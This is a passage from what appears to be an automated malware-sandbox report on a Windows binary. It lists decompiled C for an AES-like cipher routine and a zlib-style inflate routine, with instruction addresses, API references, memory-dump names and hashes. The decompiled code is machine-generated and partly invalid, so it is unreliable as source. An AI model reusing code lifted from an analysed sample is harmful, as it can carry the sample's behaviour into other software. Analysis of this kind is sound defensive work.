				_t172[5] =  *0x004089FC ^ _v8 >> 0x00000010;
				_t172[6] =  *0x004089FC ^ _v8 >> 0x00000008;
				_t172[7] =  *((_v20 & 0x000000ff) + 0x4089fc) ^ _v8;
				_t121 = _t345 + 8; // 0x6ff83c9
				_t303 =  *_t121;
				_v8 = _t303;
				_t172[8] =  *0x004089FC ^ _t303 >> 0x00000018;
				_t172[9] =  *0x004089FC ^ _v8 >> 0x00000010;
				_t172[0xa] =  *0x004089FC ^ _v8 >> 0x00000008;
				_t263 = _t262 & 0x000000ff;
				_t172[0xb] =  *((_v16 & 0x000000ff) + 0x4089fc) ^ _v8;
				_t137 = _t345 + 0xc; // 0x41c1950f
				_t346 =  *_t137;
				_v8 = _t346;
				_t172[0xc] =  *0x004089FC ^ _t346 >> 0x00000018;
				_t172[0xd] =  *0x004089FC ^ _t346 >> 0x00000010;
				_t172[0xe] =  *0x004089FC ^ _t346 >> 0x00000008;
				_t148 = _t263 + 0x4089fc; // 0x6bf27b77
				_t172[0xf] =  *_t148 ^ _v8;
				return _t172;
			}

0x00402e85
0x00402e87
0x00402e8e
0x00402e98
0x00402ea1
0x00402ea6
0x00402ea7
0x00402ea7
0x00402eac
0x00402eca
0x00402ed4
0x00402ed5
0x00402ee0
0x00402eef
0x00402ef5
0x00402eff
0x00402f00
0x00402f11
0x00402f17
0x00402f18
0x00402f26
0x00402f36
0x00402f3e
0x00402f4c
0x00402f4f
0x00402f59
0x00402f5c
0x00402f5f
0x00402fbf
0x00402fcc
0x00402fd6
0x00403016
0x00403031
0x0040303b
0x0040303e
0x00403041
0x00403044
0x00403044
0x00403047
0x00403047
0x00403050
0x00403053
0x00403053
0x00403056
0x00403059
0x00403059
0x0040305d
0x0040305d
0x00403068
0x00403078
0x0040307b
0x0040308f
0x0040309a
0x004030a4
0x004030b8
0x004030bb
0x004030bb
0x004030c4
0x004030d1
0x004030e5
0x004030fa
0x0040310e
0x00403111
0x00403111
0x0040311a
0x00403127
0x0040313b
0x0040314e
0x00403154
0x00403162
0x00403165
0x00403165
0x0040316f
0x0040317f
0x00403194
0x004031a8
0x004031ab
0x004031b5
0x004031b9

APIs

??0exception@@QAE@ABQBD@Z.MSVCRT(0040F570,?,?,?,?,?,00403554,00000002,?,?,?,?), ref: 00402E98
_CxxThrowException.MSVCRT(?,0040D570,?,?,?,?,00403554,00000002,?,?,?,?), ref: 00402EA7

Memory Dump Source

Source File: 00000002.00000002.255070484.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.255064310.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.255084606.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.255096631.000000000040E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.255115219.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File

Yara matches

Similarity

API ID: ??0exception@@ExceptionThrow
String ID:
API String ID: 941485209-0
Opcode ID: 0b3a82e1866a10e008d9e23789663a186783f6e7ea65f1ebfadb5e40c8bf56e2
Instruction ID: 7c46eb61736c4a52f21da4615b0110659747632e7974af7727d2e67ead4b8ec0
Opcode Fuzzy Hash: 0b3a82e1866a10e008d9e23789663a186783f6e7ea65f1ebfadb5e40c8bf56e2
Instruction Fuzzy Hash: 01B1AD75A081D99EDB05CFB989A04EAFFF2AF4E20474ED1E9C5C4AB313C5306505DB98

Uniqueness

Uniqueness Score: -1.00%

Function 004031BC Relevance: 3.3, APIs: 2, Instructions: 271
COMMONCrypto

Download Yara Rule

C-Code - Quality: 33%

			E004031BC(intOrPtr __ecx, signed int* _a4, signed char* _a8) {
				signed int _v8;
				void* _v9;
				void* _v10;
				void* _v11;
				signed int _v12;
				void* _v13;
				void* _v14;
				void* _v15;
				signed int _v16;
				void* _v17;
				void* _v18;
				void* _v19;
				signed int _v20;
				void* _v21;
				void* _v22;
				signed int _v24;
				signed int _v28;
				intOrPtr _v32;
				signed int _v36;
				char _v48;
				signed char* _t154;
				signed char* _t157;
				signed char* _t158;
				signed char* _t161;
				signed char* _t162;
				signed char* _t165;
				signed int _t169;
				signed int _t170;
				signed char* _t175;
				signed int _t243;
				signed int _t278;
				signed int _t288;
				signed int _t302;
				signed int* _t328;
				signed int _t332;
				signed int* _t342;
				intOrPtr _t343;
				void* _t344;
				signed int _t345;

				_t343 = __ecx;
				_v32 = __ecx;
				if( *((char*)(__ecx + 4)) == 0) {
					__imp__??0exception@@QAE@ABQBD@Z(0x40f570);
					_push(0x40d570);
					_push( &_v48);
					L0040776E();
				}
				_t154 = _a4;
				_t157 =  &(_t154[3]);
				_t158 =  &(_t157[1]);
				_t243 = (( *_t154 & 0x000000ff) << 0x00000018 | (_t154[1] & 0x000000ff) << 0x00000010 |  *_t157 & 0x000000ff) ^  *(_t343 + 0x1e8);
				_v24 = _t243;
				_t161 =  &(_t158[3]);
				_t162 =  &(_t161[1]);
				_v20 = ((_t157[1] & 0x000000ff) << 0x00000018 | (_t158[1] & 0x000000ff) << 0x00000010 |  *_t161 & 0x000000ff) ^  *(_t343 + 0x1ec);
				_t165 =  &(_t162[3]);
				_t166 =  &(_t165[1]);
				_v16 = (( *_t162 & 0x000000ff) << 0x00000018 | (_t162[1] & 0x000000ff) << 0x00000010 |  *_t165 & 0x000000ff) ^  *(_t343 + 0x1f0);
				_t169 =  *(_t343 + 0x410);
				_v36 = _t169;
				_v12 = ((_t165[1] & 0x000000ff) << 0x00000018 | (_t166[1] & 0x000000ff) << 0x00000010) ^  *(_t343 + 0x1f4);
				if(_t169 > 1) {
					_t328 = _t343 + 0x210;
					_a4 = _t328;
					_v8 = _t169 - 1;
					do {
						_t332 =  *0x00409BFC ^  *0x00409FFC;
						_v28 = _t332;
						_v28 = _t332 ^  *0x0040A3FC ^  *(0x40a7fc + (_t243 & 0x000000ff) * 4) ^ _a4[1];
						_v16 =  *0x00409BFC ^  *0x00409FFC ^  *0x0040A3FC ^  *(0x40a7fc + (_v12 & 0x000000ff) * 4) ^  *_t328;
						_v12 = _v28;
						_v20 =  *0x0040A3FC ^  *0x00409BFC ^  *0x00409FFC ^  *(0x40a7fc + (_v16 & 0x000000ff) * 4) ^  *(_t328 - 4);
						_t342 = _a4;
						_t243 =  *0x00409FFC ^  *0x0040A3FC ^  *0x00409BFC ^  *(0x40a7fc + (_v20 & 0x000000ff) * 4) ^  *(_t342 - 8);
						_t328 = _t342 + 0x20;
						_t82 =  &_v8;
						 *_t82 = _v8 - 1;
						_a4 = _t328;
						_v24 = _t243;
					} while ( *_t82 != 0);
					_t343 = _v32;
					_t169 = _v36;
				}
				_t170 = _t169 << 5;
				_t278 =  *(_t343 + 0x1e8 + _t170);
				_t344 = _t343 + 0x1e8 + _t170;
				_v8 = _t278;
				_t175 = _a8;
				 *_t175 =  *0x00408AFC ^ _t278 >> 0x00000018;
				_t175[1] =  *0x00408AFC ^ _t278 >> 0x00000010;
				_t175[2] =  *0x00408AFC ^ _v8 >> 0x00000008;
				_t175[3] =  *((_v20 & 0x000000ff) + 0x408afc) ^ _v8;
				_t288 =  *(_t344 + 4);
				_v8 = _t288;
				_t175[4] =  *0x00408AFC ^ _t288 >> 0x00000018;
				_t175[5] =  *0x00408AFC ^ _v8 >> 0x00000010;
				_t175[6] =  *0x00408AFC ^ _v8 >> 0x00000008;
				_t175[7] =  *((_v16 & 0x000000ff) + 0x408afc) ^ _v8;
				_t302 =  *(_t344 + 8);
				_v8 = _t302;
				_t175[8] =  *0x00408AFC ^ _t302 >> 0x00000018;
				_t175[9] =  *0x00408AFC ^ _v8 >> 0x00000010;
				_t175[0xa] =  *0x00408AFC ^ _v8 >> 0x00000008;
				_t175[0xb] =  *((_v12 & 0x000000ff) + 0x408afc) ^ _v8;
				_t345 =  *(_t344 + 0xc);
				_v8 = _t345;
				_t175[0xc] =  *0x00408AFC ^ _t345 >> 0x00000018;
				_t175[0xd] =  *0x00408AFC ^ _t345 >> 0x00000010;
				_t175[0xe] =  *0x00408AFC ^ _t345 >> 0x00000008;
				_t175[0xf] =  *((_t243 & 0x000000ff) + 0x408afc) ^ _v8;
				return _t175;
			}

0x004031c3
0x004031c5
0x004031cc
0x004031d6
0x004031df
0x004031e4
0x004031e5
0x004031e5
0x004031ea
0x00403206
0x00403210
0x00403211
0x0040321f
0x0040322e
0x00403234
0x0040323f
0x00403255
0x0040325b
0x00403266
0x0040327d
0x00403285
0x00403296
0x00403299
0x0040329f
0x004032a6
0x004032a9
0x004032ac
0x00403323
0x0040332f
0x0040334b
0x0040335a
0x0040336c
0x0040337b
0x00403385
0x00403388
0x0040338b
0x0040338e
0x0040338e
0x00403391
0x00403394
0x00403394
0x0040339d
0x004033a0
0x004033a0
0x004033a3
0x004033a6
0x004033ad
0x004033bb
0x004033cb
0x004033ce
0x004033e5
0x004033f8
0x0040340c
0x0040340f
0x00403418
0x00403425
0x00403439
0x0040344e
0x00403462
0x00403465
0x0040346e
0x0040347b
0x0040348f
0x004034a1
0x004034b5
0x004034b8
0x004034c2
0x004034d2
0x004034e7
0x004034fb
0x00403508
0x0040350c

APIs

??0exception@@QAE@ABQBD@Z.MSVCRT(0040F570,?,?,?,?,?,?,004037DC,00000002,?,?,?,?), ref: 004031D6
_CxxThrowException.MSVCRT(?,0040D570,?,?,?,?,?,004037DC,00000002,?,?,?,?), ref: 004031E5

Memory Dump Source

Source File: 00000002.00000002.255070484.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.255064310.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.255084606.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.255096631.000000000040E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.255115219.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File

Yara matches

Similarity

API ID: ??0exception@@ExceptionThrow
String ID:
API String ID: 941485209-0
Opcode ID: 0dda08770b2cfa47ca0284abc8234425fc657ac4a7c18576e4d0461ed08ab4c9
Instruction ID: bcf4991698fce177fafabfcfbf4d003d7da0a1e91b0dfae35dbc96c431f9713a
Opcode Fuzzy Hash: 0dda08770b2cfa47ca0284abc8234425fc657ac4a7c18576e4d0461ed08ab4c9
Instruction Fuzzy Hash: 43B1A135A081D99EDB05CFB984A04EAFFF2AF8E200B4ED1E6C9D4AB713C5705615DB84

Uniqueness

Uniqueness Score: -1.00%

Function 004043B7 Relevance: 1.9, APIs: 1, Instructions: 682
COMMONCrypto

Download Yara Rule

C-Code - Quality: 89%

			E004043B7() {
				void* __ebx;
				void** __edi;
				void* __esi;
				signed int _t426;
				signed int _t427;
				void* _t434;
				signed int _t436;
				unsigned int _t438;
				void* _t442;
				void* _t448;
				void* _t455;
				signed int _t456;
				signed int _t461;
				signed char* _t476;
				signed int _t482;
				signed int _t485;
				signed int* _t488;
				void* _t490;
				void* _t492;
				void* _t493;

				_t490 = _t492;
				_t493 = _t492 - 0x2c;
				_t488 =  *(_t490 + 8);
				_t485 =  *(_t490 + 0xc);
				_t482 = _t488[0xd];
				_t476 =  *_t485;
				 *(_t490 - 4) =  *(_t485 + 4);
				 *(_t490 + 8) = _t488[8];
				 *(_t490 + 0xc) = _t488[7];
				_t426 = _t488[0xc];
				 *(_t490 - 8) = _t482;
				if(_t482 >= _t426) {
					_t479 = _t488[0xb] - _t482;
					__eflags = _t479;
				} else {
					_t479 = _t426 - _t482 - 1;
				}
				_t427 =  *_t488;
				 *(_t490 - 0x10) = _t479;
				if(_t427 > 9) {
					L99:
					_push(0xfffffffe);
					_t488[8] =  *(_t490 + 8);
					_t488[7] =  *(_t490 + 0xc);
					 *(_t485 + 4) =  *(_t490 - 4);
					 *_t485 = _t476;
					_t320 = _t485 + 8;
					 *_t320 =  *(_t485 + 8) + _t476 -  *_t485;
					__eflags =  *_t320;
					_t488[0xd] =  *(_t490 - 8);
					goto L100;
				} else {
					while(1) {
						switch( *((intOrPtr*)(_t427 * 4 +  &M00404BBD))) {
							case 0:
								goto L7;
							case 1:
								goto L20;
							case 2:
								goto L27;
							case 3:
								goto L50;
							case 4:
								goto L58;
							case 5:
								goto L68;
							case 6:
								goto L92;
							case 7:
								goto L118;
							case 8:
								goto L122;
							case 9:
								goto L104;
						}
						L92:
						__eax =  *(__ebp + 8);
						 *(__esi + 0x20) =  *(__ebp + 8);
						__eax =  *(__ebp + 0xc);
						 *(__esi + 0x1c) =  *(__ebp + 0xc);
						__eax =  *(__ebp - 4);
						__edi[1] =  *(__ebp - 4);
						__ebx = __ebx -  *__edi;
						 *__edi = __ebx;
						__edi[2] = __edi[2] + __ebx -  *__edi;
						__eax =  *(__ebp - 8);
						 *(__esi + 0x34) =  *(__ebp - 8);
						__eax = E00403CFC(__esi, __edi,  *(__ebp + 0x10));
						__eflags = __eax - 1;
						if(__eax != 1) {
							L120:
							_push(__eax);
							L100:
							_push(_t485);
							_push(_t488);
							_t434 = E00403BD6(_t479);
							L101:
							return _t434;
						}
						 *(__ebp + 0x10) =  *(__ebp + 0x10) & 0x00000000;
						E004042AF( *(__esi + 4), __edi) = __edi[1];
						__ebx =  *__edi;
						 *(__ebp - 4) = __edi[1];
						__eax =  *(__esi + 0x20);
						_pop(__ecx);
						 *(__ebp + 8) =  *(__esi + 0x20);
						__eax =  *(__esi + 0x1c);
						_pop(__ecx);
						__ecx =  *(__esi + 0x34);
						 *(__ebp + 0xc) =  *(__esi + 0x1c);
						__eax =  *(__esi + 0x30);
						 *(__ebp - 8) = __ecx;
						__eflags = __ecx - __eax;
						if(__ecx >= __eax) {
							__eax =  *(__esi + 0x2c);
							__eax =  *(__esi + 0x2c) -  *(__ebp - 8);
							__eflags = __eax;
						} else {
							__eax = __eax - __ecx;
							__eax = __eax - 1;
						}
						__eflags =  *(__esi + 0x18);
						 *(__ebp - 0x10) = __eax;
						if( *(__esi + 0x18) != 0) {
							 *__esi = 7;
							goto L118;
						} else {
							 *__esi =  *__esi & 0x00000000;
							__eflags =  *__esi;
							L98:
							_t427 =  *_t488;
							__eflags = _t427 - 9;
							if(_t427 <= 9) {
								_t479 =  *(_t490 - 0x10);
								continue;
							}
							goto L99;
						}
						while(1) {
							L68:
							__eax =  *(__esi + 4);
							__ecx =  *(__esi + 8);
							__edx = __eax;
							__eax = __eax & 0x0000001f;
							__edx = __edx >> 5;
							__edx = __edx & 0x0000001f;
							_t187 = __eax + 0x102; // 0x102
							__eax = __edx + _t187;
							__eflags = __ecx - __edx + _t187;
							if(__ecx >= __edx + _t187) {
								break;
							}
							__eax =  *(__esi + 0x10);
							while(1) {
								__eflags =  *(__ebp + 0xc) - __eax;
								if( *(__ebp + 0xc) >= __eax) {
									break;
								}
								__eflags =  *(__ebp - 4);
								if( *(__ebp - 4) == 0) {
									L107:
									_t488[8] =  *(_t490 + 8);
									_t488[7] =  *(_t490 + 0xc);
									_t349 = _t485 + 4;
									 *_t349 =  *(_t485 + 4) & 0x00000000;
									__eflags =  *_t349;
									L108:
									_push( *(_t490 + 0x10));
									 *_t485 = _t476;
									 *(_t485 + 8) =  *(_t485 + 8) + _t476 -  *_t485;
									_t488[0xd] =  *(_t490 - 8);
									goto L100;
								}
								__edx =  *__ebx & 0x000000ff;
								__ecx =  *(__ebp + 0xc);
								 *(__ebp + 0x10) =  *(__ebp + 0x10) & 0x00000000;
								 *(__ebp - 4) =  *(__ebp - 4) - 1;
								__edx = ( *__ebx & 0x000000ff) << __cl;
								 *(__ebp + 8) =  *(__ebp + 8) | ( *__ebx & 0x000000ff) << __cl;
								__ebx = __ebx + 1;
								 *(__ebp + 0xc) =  *(__ebp + 0xc) + 8;
							}
							__eax =  *(0x40bca8 + __eax * 4);
							__ecx =  *(__esi + 0x14);
							__eax = __eax &  *(__ebp + 8);
							__edx =  *(__ecx + 4 + __eax * 8);
							__eax = __ecx + __eax * 8;
							__eflags = __edx - 0x10;
							 *(__ebp - 0x14) = __edx;
							__ecx =  *(__eax + 1) & 0x000000ff;
							 *(__ebp - 0xc) = __ecx;
							if(__edx >= 0x10) {
								__eflags = __edx - 0x12;
								if(__edx != 0x12) {
									_t222 = __edx - 0xe; // -14
									__eax = _t222;
								} else {
									__eax = 7;
								}
								__ecx = 0;
								__eflags = __edx - 0x12;
								0 | __eflags != 0x00000000 = (__eflags != 0) - 1;
								__ecx = (__eflags != 0x00000000) - 0x00000001 & 0x00000008;
								__ecx = ((__eflags != 0x00000000) - 0x00000001 & 0x00000008) + 3;
								__eflags = __ecx;
								 *(__ebp - 0x10) = __ecx;
								while(1) {
									__ecx =  *(__ebp - 0xc);
									__edx = __eax + __ecx;
									__eflags =  *(__ebp + 0xc) - __eax + __ecx;
									if( *(__ebp + 0xc) >= __eax + __ecx) {
										break;
									}
									__eflags =  *(__ebp - 4);
									if( *(__ebp - 4) == 0) {
										goto L107;
									}
									__edx =  *__ebx & 0x000000ff;
									__ecx =  *(__ebp + 0xc);
									 *(__ebp + 0x10) =  *(__ebp + 0x10) & 0x00000000;
									 *(__ebp - 4) =  *(__ebp - 4) - 1;
									__edx = ( *__ebx & 0x000000ff) << __cl;
									 *(__ebp + 8) =  *(__ebp + 8) | ( *__ebx & 0x000000ff) << __cl;
									__ebx = __ebx + 1;
									 *(__ebp + 0xc) =  *(__ebp + 0xc) + 8;
								}
								 *(__ebp + 8) =  *(__ebp + 8) >> __cl;
								 *(0x40bca8 + __eax * 4) =  *(0x40bca8 + __eax * 4) &  *(__ebp + 8);
								 *(__ebp - 0x10) =  *(__ebp - 0x10) + ( *(0x40bca8 + __eax * 4) &  *(__ebp + 8));
								__ecx = __eax;
								 *(__ebp + 8) =  *(__ebp + 8) >> __cl;
								__ecx =  *(__ebp - 0xc);
								__eax = __eax +  *(__ebp - 0xc);
								__ecx =  *(__esi + 8);
								 *(__ebp + 0xc) =  *(__ebp + 0xc) - __eax;
								__eax =  *(__esi + 4);
								__edx = __eax;
								__eax = __eax & 0x0000001f;
								__edx = __edx >> 5;
								__edx = __edx & 0x0000001f;
								_t254 = __eax + 0x102; // 0x102
								__eax = __edx + _t254;
								 *(__ebp - 0x10) =  *(__ebp - 0x10) + __ecx;
								__eflags =  *(__ebp - 0x10) + __ecx - __eax;
								if( *(__ebp - 0x10) + __ecx > __eax) {
									L111:
									__edi[9](__edi[0xa],  *(__esi + 0xc)) =  *(__ebp + 8);
									 *__esi = 9;
									__edi[6] = "invalid bit length repeat";
									 *(__esi + 0x20) =  *(__ebp + 8);
									__eax =  *(__ebp + 0xc);
									 *(__esi + 0x1c) =  *(__ebp + 0xc);
									__eax =  *(__ebp - 4);
									__edi[1] =  *(__ebp - 4);
									__ebx = __ebx -  *__edi;
									 *__edi = __ebx;
									__edi[2] = __edi[2] + __ebx -  *__edi;
									__eax =  *(__ebp - 8);
									 *(__esi + 0x34) =  *(__ebp - 8);
									__eax = E00403BD6(__ecx, __esi, __edi, 0xfffffffd);
									goto L101;
								}
								__eflags =  *(__ebp - 0x14) - 0x10;
								if( *(__ebp - 0x14) != 0x10) {
									__eax = 0;
									__eflags = 0;
									do {
										L87:
										__edx =  *(__esi + 0xc);
										 *( *(__esi + 0xc) + __ecx * 4) = __eax;
										__ecx = __ecx + 1;
										_t264 = __ebp - 0x10;
										 *_t264 =  *(__ebp - 0x10) - 1;
										__eflags =  *_t264;
									} while ( *_t264 != 0);
									 *(__esi + 8) = __ecx;
									continue;
								}
								__eflags = __ecx - 1;
								if(__ecx < 1) {
									goto L111;
								}
								__eax =  *(__esi + 0xc);
								__eax =  *( *(__esi + 0xc) + __ecx * 4 - 4);
								goto L87;
							}
							 *(__ebp + 8) =  *(__ebp + 8) >> __cl;
							__eax = __ecx;
							__ecx =  *(__esi + 0xc);
							 *(__ebp + 0xc) =  *(__ebp + 0xc) - __eax;
							__eax =  *(__esi + 8);
							 *( *(__esi + 0xc) +  *(__esi + 8) * 4) = __edx;
							 *(__esi + 8) =  *(__esi + 8) + 1;
						}
						__ecx = __ebp - 0x28;
						__eax =  *(__esi + 4);
						 *(__esi + 0x14) =  *(__esi + 0x14) & 0x00000000;
						 *(__ebp - 0x14) = 9;
						__ebp - 0x2c = __ebp - 0x10;
						__ecx = __ebp - 0x14;
						__ecx = __eax;
						__eax = __eax & 0x0000001f;
						__ecx = __ecx >> 5;
						__ecx = __ecx & 0x0000001f;
						__eax = __eax + 0x101;
						__ecx = __ecx + 1;
						 *(__ebp - 0x10) = 6;
						__eax = E0040501F(__eax, __ecx,  *(__esi + 0xc), __ebp - 0x14, __ebp - 0x10, __ebp - 0x2c, __ebp - 0x28,  *((intOrPtr*)(__esi + 0x24)), __edi);
						 *(__ebp - 0xc) = __eax;
						__eflags = __eax;
						if(__eax != 0) {
							__eflags =  *(__ebp - 0xc) - 0xfffffffd;
							L113:
							if(__eflags == 0) {
								__eax = __edi[9](__edi[0xa],  *(__esi + 0xc));
								_pop(__ecx);
								 *__esi = 9;
								_pop(__ecx);
							}
							__eax =  *(__ebp + 8);
							_push( *(__ebp - 0xc));
							 *(__esi + 0x20) =  *(__ebp + 8);
							__eax =  *(__ebp + 0xc);
							 *(__esi + 0x1c) =  *(__ebp + 0xc);
							__eax =  *(__ebp - 4);
							__edi[1] =  *(__ebp - 4);
							__ebx = __ebx -  *__edi;
							 *__edi = __ebx;
							__edi[2] = __edi[2] + __ebx -  *__edi;
							__eax =  *(__ebp - 8);
							 *(__esi + 0x34) =  *(__ebp - 8);
							goto L100;
						}
						__eax = E00403CC8( *(__ebp - 0x14),  *(__ebp - 0x10),  *((intOrPtr*)(__ebp - 0x2c)),  *(__ebp - 0x28), __edi);
						__eflags = __eax;
						if(__eax == 0) {
							L116:
							_push(0xfffffffc);
							_t488[8] =  *(_t490 + 8);
							_t488[7] =  *(_t490 + 0xc);
							 *(_t485 + 4) =  *(_t490 - 4);
							 *_t485 = _t476;
							 *(_t485 + 8) =  *(_t485 + 8) + _t476 -  *_t485;
							_t488[0xd] =  *(_t490 - 8);
							goto L100;
						}
						 *(__esi + 4) = __eax;
						__eax = __edi[9](__edi[0xa],  *(__esi + 0xc));
						_pop(__ecx);
						 *__esi = 6;
						_pop(__ecx);
						goto L92;
						L58:
						 *(__esi + 4) =  *(__esi + 4) >> 0xa;
						__eax = ( *(__esi + 4) >> 0xa) + 4;
						__eflags =  *(__esi + 8) - ( *(__esi + 4) >> 0xa) + 4;
						if( *(__esi + 8) >= ( *(__esi + 4) >> 0xa) + 4) {
							while(1) {
								L64:
								__eflags =  *(__esi + 8) - 0x13;
								if( *(__esi + 8) >= 0x13) {
									break;
								}
								__eax =  *(__esi + 8);
								__ecx =  *(__esi + 0xc);
								 *(__ecx +  *(0x40cdf0 +  *(__esi + 8) * 4) * 4) =  *( *(__esi + 0xc) +  *(0x40cdf0 +  *(__esi + 8) * 4) * 4) & 0x00000000;
								 *(__esi + 8) =  *(__esi + 8) + 1;
							}
							__ecx = __esi + 0x14;
							__eax = __esi + 0x10;
							 *(__esi + 0x10) = 7;
							__eax = E00404FA0( *(__esi + 0xc), __eax, __ecx,  *((intOrPtr*)(__esi + 0x24)), __edi);
							 *(__ebp - 0xc) = __eax;
							__eflags = __eax;
							if(__eax != 0) {
								__eflags =  *(__ebp - 0xc) - 0xfffffffd;
								goto L113;
							}
							_t182 = __esi + 8;
							 *_t182 =  *(__esi + 8) & __eax;
							__eflags =  *_t182;
							 *__esi = 5;
							goto L68;
						} else {
							goto L59;
						}
						do {
							L59:
							__ecx =  *(__ebp + 0xc);
							while(1) {
								__eflags = __ecx - 3;
								if(__ecx >= 3) {
									goto L63;
								}
								__eflags =  *(__ebp - 4);
								if( *(__ebp - 4) == 0) {
									goto L107;
								}
								__eax =  *__ebx & 0x000000ff;
								 *(__ebp + 0x10) =  *(__ebp + 0x10) & 0x00000000;
								 *(__ebp - 4) =  *(__ebp - 4) - 1;
								__eax = ( *__ebx & 0x000000ff) << __cl;
								 *(__ebp + 8) =  *(__ebp + 8) | ( *__ebx & 0x000000ff) << __cl;
								__ebx = __ebx + 1;
								__ecx = __ecx + 8;
								 *(__ebp + 0xc) = __ecx;
							}
							L63:
							__ecx =  *(__esi + 8);
							__eax =  *(__ebp + 8);
							__edx =  *(__esi + 0xc);
							__eax =  *(__ebp + 8) & 0x00000007;
							__ecx =  *(0x40cdf0 +  *(__esi + 8) * 4);
							 *(__ebp + 0xc) =  *(__ebp + 0xc) - 3;
							 *(__ebp + 8) =  *(__ebp + 8) >> 3;
							 *( *(__esi + 0xc) +  *(0x40cdf0 +  *(__esi + 8) * 4) * 4) =  *(__ebp + 8) & 0x00000007;
							__ecx =  *(__esi + 4);
							 *(__esi + 8) =  *(__esi + 8) + 1;
							__eax =  *(__esi + 8);
							 *(__esi + 4) >> 0xa = ( *(__esi + 4) >> 0xa) + 4;
							__eflags =  *(__esi + 8) - ( *(__esi + 4) >> 0xa) + 4;
						} while ( *(__esi + 8) < ( *(__esi + 4) >> 0xa) + 4);
						goto L64;
						L50:
						__ecx =  *(__ebp + 0xc);
						while(1) {
							__eflags = __ecx - 0xe;
							if(__ecx >= 0xe) {
								break;
							}
							__eflags =  *(__ebp - 4);
							if( *(__ebp - 4) == 0) {
								goto L107;
							}
							__eax =  *__ebx & 0x000000ff;
							 *(__ebp + 0x10) =  *(__ebp + 0x10) & 0x00000000;
							 *(__ebp - 4) =  *(__ebp - 4) - 1;
							__eax = ( *__ebx & 0x000000ff) << __cl;
							 *(__ebp + 8) =  *(__ebp + 8) | ( *__ebx & 0x000000ff) << __cl;
							__ebx = __ebx + 1;
							__ecx = __ecx + 8;
							 *(__ebp + 0xc) = __ecx;
						}
						__eax =  *(__ebp + 8);
						__eax =  *(__ebp + 8) & 0x00003fff;
						__ecx = __eax;
						 *(__esi + 4) = __eax;
						__ecx = __eax & 0x0000001f;
						__eflags = __ecx - 0x1d;
						if(__ecx > 0x1d) {
							L109:
							 *__esi = 9;
							__edi[6] = "too many length or distance symbols";
							break;
						}
						__eax = __eax & 0x000003e0;
						__eflags = (__eax & 0x000003e0) - 0x3a0;
						if((__eax & 0x000003e0) > 0x3a0) {
							goto L109;
						}
						__eax = __eax >> 5;
						__eax = __eax & 0x0000001f;
						__eax = __edi[8](__edi[0xa], __eax, 4);
						__esp = __esp + 0xc;
						 *(__esi + 0xc) = __eax;
						__eflags = __eax;
						if(__eax == 0) {
							goto L116;
						}
						 *(__ebp + 8) =  *(__ebp + 8) >> 0xe;
						 *(__ebp + 0xc) =  *(__ebp + 0xc) - 0xe;
						_t138 = __esi + 8;
						 *_t138 =  *(__esi + 8) & 0x00000000;
						__eflags =  *_t138;
						 *__esi = 4;
						goto L58;
						L27:
						__eflags =  *(__ebp - 4);
						if( *(__ebp - 4) == 0) {
							goto L107;
						}
						__eflags = __ecx;
						if(__ecx != 0) {
							L44:
							__eax =  *(__esi + 4);
							__ecx =  *(__ebp - 4);
							 *(__ebp + 0x10) =  *(__ebp + 0x10) & 0x00000000;
							__eflags = __eax - __ecx;
							 *(__ebp - 0xc) = __eax;
							if(__eax > __ecx) {
								 *(__ebp - 0xc) = __ecx;
							}
							__eax =  *(__ebp - 0x10);
							__eflags =  *(__ebp - 0xc) - __eax;
							if( *(__ebp - 0xc) > __eax) {
								 *(__ebp - 0xc) = __eax;
							}
							__eax = memcpy( *(__ebp - 8), __ebx,  *(__ebp - 0xc));
							__eax =  *(__ebp - 0xc);
							__esp = __esp + 0xc;
							 *(__ebp - 4) =  *(__ebp - 4) - __eax;
							 *(__ebp - 8) =  *(__ebp - 8) + __eax;
							 *(__ebp - 0x10) =  *(__ebp - 0x10) - __eax;
							__ebx = __ebx + __eax;
							_t115 = __esi + 4;
							 *_t115 =  *(__esi + 4) - __eax;
							__eflags =  *_t115;
							if( *_t115 == 0) {
								L49:
								 *(__esi + 0x18) =  ~( *(__esi + 0x18));
								asm("sbb eax, eax");
								__eax =  ~( *(__esi + 0x18)) & 0x00000007;
								L16:
								 *_t488 = _t456;
							}
							goto L98;
						}
						__ecx =  *(__esi + 0x2c);
						__eflags = __edx - __ecx;
						if(__edx != __ecx) {
							L35:
							__eax =  *(__ebp - 8);
							 *(__esi + 0x34) =  *(__ebp - 8);
							__eax = E00403BD6(__ecx, __esi, __edi,  *(__ebp + 0x10));
							__ecx =  *(__esi + 0x30);
							 *(__ebp + 0x10) = __eax;
							__eax =  *(__esi + 0x34);
							__eflags = __eax - __ecx;
							 *(__ebp - 8) = __eax;
							if(__eax >= __ecx) {
								__edx =  *(__esi + 0x2c);
								__edx =  *(__esi + 0x2c) -  *(__ebp - 8);
								__eflags = __edx;
								 *(__ebp - 0x10) = __edx;
							} else {
								__ecx = __ecx -  *(__ebp - 8);
								__eax = __ecx -  *(__ebp - 8) - 1;
								 *(__ebp - 0x10) = __ecx -  *(__ebp - 8) - 1;
							}
							__edx =  *(__esi + 0x2c);
							__eflags =  *(__ebp - 8) - __edx;
							if( *(__ebp - 8) == __edx) {
								__eax =  *(__esi + 0x28);
								__eflags = __eax - __ecx;
								if(__eflags != 0) {
									 *(__ebp - 8) = __eax;
									if(__eflags >= 0) {
										__edx = __edx - __eax;
										__eflags = __edx;
										 *(__ebp - 0x10) = __edx;
									} else {
										__ecx = __ecx - __eax;
										__ecx = __ecx - 1;
										 *(__ebp - 0x10) = __ecx;
									}
								}
							}
							__eflags =  *(__ebp - 0x10);
							if( *(__ebp - 0x10) == 0) {
								__eax =  *(__ebp + 8);
								 *(__esi + 0x20) =  *(__ebp + 8);
								__eax =  *(__ebp + 0xc);
								 *(__esi + 0x1c) =  *(__ebp + 0xc);
								__eax =  *(__ebp - 4);
